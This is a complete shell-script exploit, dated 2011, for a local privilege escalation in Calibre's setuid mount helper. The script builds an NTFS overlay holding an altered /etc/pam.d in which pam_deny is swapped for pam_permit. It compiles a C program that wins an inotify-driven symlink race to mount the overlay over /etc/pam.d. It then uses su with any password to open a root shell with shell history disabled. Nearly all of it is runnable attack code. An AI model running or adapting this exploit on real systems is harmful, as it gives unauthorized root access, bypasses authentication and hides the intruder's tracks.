#!/bin/sh
 
             ###########################################
             #         .70-Calibrer Assault Mount      #
             #  by Dan Rosenberg (@djrbliss) and zx2c4 #
             ###########################################
 
################################################################################
# Yesterday we learned how Calibre's ability to mount anything anywhere resulted
# in a local root. Today's exploit shows a race condition to subvert recent
# changes preventing symlinks and checking path prefixes.
#
# - djrbliss & zx2c4
# 2011-11-3
################################################################################
 
 
overlay=/dev/shm/overlay
staging=/media/staging
mounter=calibre-mount-helper
fakemount=/media/staging/fake
target=/etc/pam.d
mkfsntfs=/sbin/mkfs.ntfs
 
echo "[+] Making overlay image:"
dd if=/dev/zero of=$overlay count=51200
$mkfsntfs -F $overlay
 
echo "[+] Mounting overlay image using calibre-mount-helper."
$mounter mount $overlay $staging
 
echo "[+] Copying /etc/pam.d/ into overlay."
cp /etc/pam.d/* $staging/ 2>/dev/null
 
sed -i "s/pam_deny.so/pam_permit.so/g" $staging/common-auth
 
echo "[*] Making fake mountpoint."
rm -rf $fakemount 2>/dev/null
 
echo "[*] Preparing binary payload..."
 
cat > /tmp/pwn.c << _EOF
#include <stdio.h>
#include <sys/inotify.h>
#include <unistd.h>
 
int main(int argc, char **argv)
{
 
    int fd, wd, ret;
 
        if (fork()) {
                fd = inotify_init();
 
                unlink("$fakemount");
                mkdir("$fakemount");
                 
                wd = inotify_add_watch(fd, "$fakemount", IN_CREATE);
                read(fd, 0, 0);
                 
                rename("$fakemount", "$staging/tmp");
                symlink("$target", "$fakemount");
                rmdir("$staging/tmp");
 
                return 0;
 
    } else {
        sleep(1);
        return system("$mounter mount $overlay $fakemount");
    }
    return 0;
}
_EOF
 
gcc /tmp/pwn.c -o /tmp/pwn
ret=1
while [ $ret -ne 0 ]; do
    /tmp/pwn
    ret=$?
done;
 
sleep 2
 
echo "[+] Asking for root. When prompted for a password, type anything and press enter."
su -c "echo \"[+] Cleaning up.\"; umount $fakemount; umount $staging; rm -rf $overlay; echo \"[+] Getting shell.\"; HISTFILE=\"/dev/null\" exec /bin/sh"